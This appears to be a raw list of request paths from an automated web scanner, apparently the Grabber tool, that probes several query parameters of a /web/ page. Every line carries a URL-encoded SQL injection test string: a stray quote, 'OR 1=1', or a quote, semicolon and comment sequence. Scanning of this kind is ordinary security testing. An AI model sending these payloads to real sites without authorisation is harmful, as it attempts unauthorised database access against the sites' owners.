/web/
/web/?demo-email=1%27GRABBER_SQL_INJECTION
/web/?demo-email=1%27GRABBER_SQL_INJECTION
/web/?demo-email=OR+1%3D1
/web/?demo-email=OR+1%3D1
/web/?demo-email=%27%3B--
/web/?demo-email=%27%3B--
/web/?name=1%27GRABBER_SQL_INJECTION
/web/?name=1%27GRABBER_SQL_INJECTION
/web/?name=OR+1%3D1
/web/?name=OR+1%3D1
/web/?name=%27%3B--
/web/?name=%27%3B--
/web/?demo-priority=1%27GRABBER_SQL_INJECTION
/web/?demo-priority=1%27GRABBER_SQL_INJECTION
/web/?demo-priority=OR+1%3D1
/web/?demo-priority=OR+1%3D1
/web/?demo-priority=%27%3B--
/web/?demo-priority=%27%3B--
/web/?demo-human=1%27GRABBER_SQL_INJECTION
/web/?demo-human=1%27GRABBER_SQL_INJECTION
/web/?demo-human=OR+1%3D1
/web/?demo-human=OR+1%3D1
/web/?demo-human=%27%3B--
/web/?demo-human=%27%3B--
/web/?demo-name=1%27GRABBER_SQL_INJECTION
/web/?demo-name=1%27GRABBER_SQL_INJECTION
/web/?demo-name=OR+1%3D1
/web/?demo-name=OR+1%3D1
/web/?demo-name=%27%3B--
/web/?demo-name=%27%3B--
/web/?demo-copy=1%27GRABBER_SQL_INJECTION
/web/?demo-copy=1%27GRABBER_SQL_INJECTION
/web/?demo-copy=OR+1%3D1
/web/?demo-copy=OR+1%3D1
/web/?demo-copy=%27%3B--
/web/?demo-copy=%27%3B--
/web/?email=1%27GRABBER_SQL_INJECTION
/web/?email=1%27GRABBER_SQL_INJECTION
/web/?email=OR+1%3D1
/web/?email=OR+1%3D1
/web/?email=%27%3B--
/web/?email=%27%3B--
/web/?demo-email=1%27GRABBER_SQL_INJECTION&name=1%27GRABBER_SQL_INJECTION&demo-priority=1%27GRABBER_SQL_INJECTION&demo-human=1%27GRABBER_SQL_INJECTION&demo-name=1%27GRABBER_SQL_INJECTION&demo-copy=1%27GRABBER_SQL_INJECTION&email=1%27GRABBER_SQL_INJECTION&
/web/?demo-email=OR+1%3D1&name=OR+1%3D1&demo-priority=OR+1%3D1&demo-human=OR+1%3D1&demo-name=OR+1%3D1&demo-copy=OR+1%3D1&email=OR+1%3D1&
/web/?demo-email=%27%3B--&name=%27%3B--&demo-priority=%27%3B--&demo-human=%27%3B--&demo-name=%27%3B--&demo-copy=%27%3B--&email=%27%3B--&
